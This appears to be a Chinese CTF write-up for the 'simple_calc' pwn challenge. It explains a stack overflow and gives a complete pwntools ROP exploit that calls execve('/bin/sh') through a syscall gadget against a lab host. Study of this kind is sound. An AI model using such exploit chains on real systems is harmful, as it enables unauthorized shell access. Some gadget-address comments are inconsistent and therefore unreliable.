simple_calc

发表于 | 分类于 |

i春秋上给的课后例题不错,近期打算把这上面的题刷一刷,巩固一下基础。还是一道简单的ROP练习题。

还是64位文件,保护措施是只开启了NX保护。
ida f5反汇编以后查看主函数
main
可以看到漏洞主要是在case5处的复制产生了栈溢出,程序里面没有system函数,所以可以先看一下能否使用系统调用
syscall
我们可以看到果然有syscall命令,这样就可以调用execve(“bin/sh”)函数获取shell,需要满足的条件如下:

  • RAX:59
  • RDI:RSP
  • RSI:0
  • RDX:0
    我们需要找到下面的gadeget:
  • pop rax, ret
  • pop rid, rdx, ret
  • mov rsi, rsp
  • syscall
    脚本如下
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    #!/usr/bin/python
    #coding:utf-8

    from pwn import *

    context.update(arch = 'amd64', os = 'linux', timeout = 1)
    io = remote('172.17.0.3', 10001)

    io.recv()					#39次计算,ROP的长度
    io.sendline('39')

    #padding
    for i in range(18):			
    	io.sendline('2')
    	io.sendline('42')
    	io.sendline('42')
    	sleep(0.1)

    #0x44db34-->pop rax; ret
    io.sendline('1')
    io.sendline('2256282')
    io.sendline('2256282')
    sleep(0.1)

    #地址高32位置0
    io.sendline('2')
    io.sendline('42')
    io.sendline('42')
    sleep(0.1)

    #0x3b-->rax = 0x3b
    io.sendline('2')
    io.sendline('101')
    io.sendline('42')
    sleep(0.1)

    #地址高32位置0
    io.sendline('2')
    io.sendline('42')
    io.sendline('42')
    sleep(0.1)

    #0x401c87-->pop rsi; ret
    io.sendline('1')
    io.sendline('2100803')
    io.sendline('2100804')
    sleep(0.1)

    #地址高32位置0
    io.sendline('2')
    io.sendline('42')
    io.sendline('42')
    sleep(0.1)

    #0x0-->rsi = 0
    io.sendline('2')
    io.sendline('42')
    io.sendline('42')
    sleep(0.1)

    #地址高32位置0
    io.sendline('2')
    io.sendline('42')
    io.sendline('42')
    sleep(0.1)

    #0x44db34-->pop rdx; ret
    io.sendline('1')
    io.sendline('2211138')
    io.sendline('2211139')
    sleep(0.1)

    #地址高32位置0
    io.sendline('2')
    io.sendline('42')
    io.sendline('42')
    sleep(0.1)

    #0x0-->rdx = 0
    io.sendline('2')
    io.sendline('42')
    io.sendline('42')
    sleep(0.1)

    #地址高32位置0
    io.sendline('2')
    io.sendline('42')
    io.sendline('42')
    sleep(0.1)

    #0x400493-->pop r12; ret
    io.sendline('1')
    io.sendline('2097737')
    io.sendline('2097738')
    sleep(0.1)

    #地址高32位置0
    io.sendline('2')
    io.sendline('42')
    io.sendline('42')
    sleep(0.1)

    #0x44db34-->syscall; ret	r12 = syscall address
    io.sendline('1')
    io.sendline('2303090')
    io.sendline('2303091')
    sleep(0.1)

    #地址高32位置0
    io.sendline('2')
    io.sendline('42')
    io.sendline('42')
    sleep(0.1)

    #0x492468--> mov rdi, rsp; call r12
    io.sendline('1')
    io.sendline('2396724')
    io.sendline('2396724')
    sleep(0.1)

    #地址高32位置0
    io.sendline('2')
    io.sendline('42')
    io.sendline('42')
    sleep(0.1)

    # /bin/sh\0 => nib/ \0hs/	rdi = rsp-->"/bin/sh" address
    io.sendline('1')
    io.sendline('926200087')
    io.sendline('926200088')
    sleep(0.1)

    io.sendline('1')
    io.sendline('3422615')
    io.sendline('3422616')
    sleep(0.1)

    io.sendline('5')	#退出时程序将计算结果从堆复制到栈,劫持RIP到ROP链上
    io.interactive()
-------------本文结束感谢您的阅读-------------
+ +